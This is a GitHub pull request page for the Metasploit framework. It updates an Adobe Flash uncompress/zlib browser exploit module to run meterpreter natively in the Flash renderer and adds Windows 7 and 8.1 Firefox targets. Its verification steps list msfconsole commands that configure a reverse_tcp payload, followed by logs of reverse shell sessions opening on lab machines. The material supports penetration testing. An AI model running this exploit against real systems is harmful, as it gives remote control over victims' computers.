Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

adobe_flash_uncompress_zlib_uninitialized: Execution from the flash renderer / Windows 8.1 #5519

Merged
merged 4 commits into from Jun 10, 2015
Merged

adobe_flash_uncompress_zlib_uninitialized: Execution from the flash renderer / Windows 8.1 #5519

merged 4 commits into from Jun 10, 2015

Conversation

jvazquez-r7
Copy link
Contributor

This PR modifies modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb to use the flash exploitation code, allowing native payload execution from the flash renderer process. So not more powershell. We execute meterpreter directly and we remain in the same flash renderer process.

It also adds supports for:

  • Firefox (32 bits) / Adobe Flash plug-in on Windows 7 SP1.
  • Firefox (32 bits) / Adobe Flash plug-in on Windows 8.1

Verification

  • Install a Windows 7 target: Windows 7 SP1 32 bits / IE 11 / Firefox 38.0.5 / Adobe Flash 15.0.0.189 (ActiveX and plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32 bits or 64 bits), Firefox 38.0.5 (32 bits) and Flash 15.0.0.189 (Plug-in)
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized
  • Run the module with the windows/meterpreter/reverse_tcp payload
msf > use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 15.0.0.189 (ActiveX), verify which you get a session and it lives inside the IE renderer process:
msf exploit(adobe_flash_uncompress_zlib_uninitialized) >
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Gathering target information.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML response.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML...
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/BgHb.swf
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.131:50522) at 2015-06-09 15:52:03 -0500

msf exploit(adobe_flash_uncompress_zlib_uninitialized) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
getLogged On Users : 2
pMeterpreter     : x86/win32
meterpreter > getpid
Current pid: 1124
meterpreter > ps -S 1124


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 1124  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter > exit
[*] Shutting down Meterpreter...
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 15.0.0.189 (plugin), verify which you get a session and it lives inside the Flash renderer process:
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > [*] Using URL: http://172.16.158.1:8080/To2uueK
[*] Server started.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Gathering target information.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML response.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML...
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/HpNv.swf
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:50513) at 2015-06-09 15:51:34 -0500

msf exploit(adobe_flash_uncompress_zlib_uninitialized) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2064
meterpreter > ps -S 2064


Process list
============

 PID   Name                              Arch  Session  User                          Path
 ---   ----                              ----  -------  ----                          ----
 2064  FlashPlayerPlugin_15_0_0_189.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe


meterpreter > exit
[*] Shutting down Meterpreter...
  • Visit the page from Window 8.1 / Firefox 38.0.5 / Adobe Flash 15.0.0.189 (Plugin), verify which you get a session and it lives inside the Flash renderer process:
[_] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Sending HTML response.
[_] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/
[_] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Sending HTML...
[_] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/kNMqC.swf
[_] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Sending SWF...
[_] Sending stage (884270 bytes) to 172.16.158.132
[_] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.132:51051) at 2015-06-09 15:59:07 -0500

msf exploit(adobe_flash_uncompress_zlib_uninitialized) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
gMeterpreter     : x86/win32
meterpreter > getpid
Current pid: 2644
meterpreter > ps -S 2644
# Process list

 PID   Name                              Arch  Session  User                  Path

---

 2644  FlashPlayerPlugin_15_0_0_189.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe

meterpreter >

@wchen-r7 wchen-r7 self-assigned this Jun 10, 2015
@wchen-r7 wchen-r7 merged commit e5d6c9a into rapid7:master Jun 10, 2015
wchen-r7 added a commit that referenced this pull request Jun 10, 2015
@wchen-r7
Land #5519, adobe_flash_uncompress_zlib_uninitialized in the flash re…
d622c78 
…nderer
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
enhancement module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7